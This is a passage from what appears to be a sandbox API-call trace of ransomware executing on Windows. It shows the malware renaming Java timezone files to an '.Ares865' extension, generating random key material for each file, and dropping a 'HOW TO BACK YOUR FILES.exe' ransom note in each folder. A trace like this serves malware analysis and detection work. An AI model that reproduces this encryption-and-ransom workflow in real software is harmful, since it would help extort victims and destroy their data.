(x86)\\java\\jre7\\lib\\zi\\europe\\volgograd.ares865"), dwFlags=0x1) returned 1 [0134.044] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Volgograd.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\volgograd.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.044] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=565) returned 1 [0134.044] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.045] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.045] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.048] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.048] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.048] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.049] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Warsaw" | out: lpString1="Warsaw") returned="Warsaw" [0134.049] lstrlenW (lpString="Warsaw") returned 6 [0134.049] lstrlenW (lpString="Ares865") returned 7 [0134.049] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Warsaw.Ares865") returned 61 [0134.049] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Warsaw" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\warsaw"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Warsaw.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\warsaw.ares865"), dwFlags=0x1) returned 1 [0134.051] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Warsaw.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\warsaw.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.051] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1416) returned 1 [0134.051] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.052] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.052] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.054] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.055] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.055] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.055] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Zaporozhye" | out: lpString1="Zaporozhye") returned="Zaporozhye" [0134.056] lstrlenW (lpString="Zaporozhye") returned 10 [0134.056] lstrlenW (lpString="Ares865") returned 7 [0134.056] lstrcmpiW (lpString1="orozhye", lpString2="Ares865") returned 1 [0134.056] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Zaporozhye.Ares865") returned 65 [0134.056] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Zaporozhye" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\zaporozhye"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Zaporozhye.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\zaporozhye.ares865"), dwFlags=0x1) returned 1 [0134.057] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Zaporozhye.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\zaporozhye.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.057] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1072) returned 1 [0134.058] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.058] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.058] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.061] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.062] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.062] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.062] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Zurich" | out: lpString1="Zurich") returned="Zurich" [0134.062] lstrlenW (lpString="Zurich") returned 6 [0134.062] lstrlenW (lpString="Ares865") returned 7 [0134.063] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Zurich.Ares865") returned 61 [0134.063] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Zurich" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\zurich"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Zurich.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\zurich.ares865"), dwFlags=0x1) returned 1 [0134.064] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Zurich.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\zurich.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.064] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1040) returned 1 [0134.064] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.065] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.065] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.067] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.068] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.068] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.068] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc" [0134.069] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc" [0134.069] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0134.069] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\how to back your files.exe"), bFailIfExists=1) returned 0 [0134.069] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0134.070] GetLastError () returned 0x0 [0134.071] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0134.071] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74639ce0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x52b13ea0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52b13ea0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0134.071] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0134.071] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0134.072] lstrcpyW (in: lpString1=0x2cce458, lpString2="GMT" | out: lpString1="GMT") returned="GMT" [0134.072] lstrlenW (lpString="GMT") returned 3 [0134.072] lstrlenW (lpString="Ares865") returned 7 [0134.072] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT.Ares865") returned 55 [0134.072] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt.ares865"), dwFlags=0x1) returned 1 [0134.074] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.074] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0134.074] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.075] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.075] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.077] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.078] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.078] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.079] lstrcpyW (in: lpString1=0x2cce458, lpString2="GMT+1" | out: lpString1="GMT+1") returned="GMT+1" [0134.079] lstrlenW (lpString="GMT+1") returned 5 [0134.079] lstrlenW (lpString="Ares865") returned 7 [0134.079] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+1.Ares865") returned 57 [0134.079] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+1" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+1"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+1.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+1.ares865"), dwFlags=0x1) returned 1 [0134.083] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+1.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+1.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.083] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0134.084] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.084] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.084] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.088] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.089] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.089] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.089] lstrcpyW (in: lpString1=0x2cce458, lpString2="GMT+10" | out: lpString1="GMT+10") returned="GMT+10" [0134.089] lstrlenW (lpString="GMT+10") returned 6 [0134.089] lstrlenW (lpString="Ares865") returned 7 [0134.090] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+10.Ares865") returned 58 [0134.090] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+10" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+10"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+10.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+10.ares865"), dwFlags=0x1) returned 1 [0134.091] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+10.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+10.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.091] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0134.092] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.092] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.092] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.095] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.095] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.095] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.096] lstrcpyW (in: lpString1=0x2cce458, lpString2="GMT+11" | out: lpString1="GMT+11") returned="GMT+11" [0134.096] lstrlenW (lpString="GMT+11") returned 6 [0134.096] lstrlenW (lpString="Ares865") returned 7 [0134.096] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+11.Ares865") returned 58 [0134.096] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+11" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+11"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+11.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+11.ares865"), dwFlags=0x1) returned 1 [0134.098] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+11.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+11.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.098] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0134.098] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.099] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.099] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.104] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.105] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.105] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.105] lstrcpyW (in: lpString1=0x2cce458, lpString2="GMT+12" | out: lpString1="GMT+12") returned="GMT+12" [0134.105] lstrlenW (lpString="GMT+12") returned 6 [0134.105] lstrlenW (lpString="Ares865") returned 7 [0134.106] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+12.Ares865") returned 58 [0134.106] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+12" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+12"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+12.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+12.ares865"), dwFlags=0x1) returned 1 [0134.107] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+12.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+12.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.107] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0134.107] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.108] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.108] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.111] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.112] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.112] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.112] lstrcpyW (in: lpString1=0x2cce458, lpString2="GMT+2" | out: lpString1="GMT+2") returned="GMT+2" [0134.112] lstrlenW (lpString="GMT+2") returned 5 [0134.112] lstrlenW (lpString="Ares865") returned 7 [0134.112] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+2.Ares865") returned 57 [0134.113] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+2" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+2"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+2.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+2.ares865"), dwFlags=0x1) returned 1 [0134.114] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+2.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+2.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.114] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0134.115] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.115] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.115] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.118] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.119] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.119] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.119] lstrcpyW (in: lpString1=0x2cce458, lpString2="GMT+3" | out: lpString1="GMT+3") returned="GMT+3" [0134.119] lstrlenW (lpString="GMT+3") returned 5 [0134.119] lstrlenW (lpString="Ares865") returned 7 [0134.120] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+3.Ares865") returned 57 [0134.120] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+3" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+3"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+3.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+3.ares865"), dwFlags=0x1) returned 1 [0134.121] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+3.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+3.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.121] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0134.122] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.122] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.122] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.125] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.126] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.126] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.126] lstrcpyW (in: lpString1=0x2cce458, lpString2="GMT+4" | out: lpString1="GMT+4") returned="GMT+4" [0134.126] lstrlenW (lpString="GMT+4") returned 5 [0134.126] lstrlenW (lpString="Ares865") returned 7 [0134.127] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+4.Ares865") returned 57 [0134.127] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+4" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+4"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+4.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+4.ares865"), dwFlags=0x1) returned 1 [0134.128] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+4.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+4.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.129] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0134.129] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.129] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.130] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.132] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.133] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.133] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.133] lstrcpyW (in: lpString1=0x2cce458, lpString2="GMT+5" | out: lpString1="GMT+5") returned="GMT+5" [0134.133] lstrlenW (lpString="GMT+5") returned 5 [0134.133] lstrlenW (lpString="Ares865") returned 7 [0134.134] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+5.Ares865") returned 57 [0134.134] MoveFileExW (lpExistingFileName="C:\\Program Files 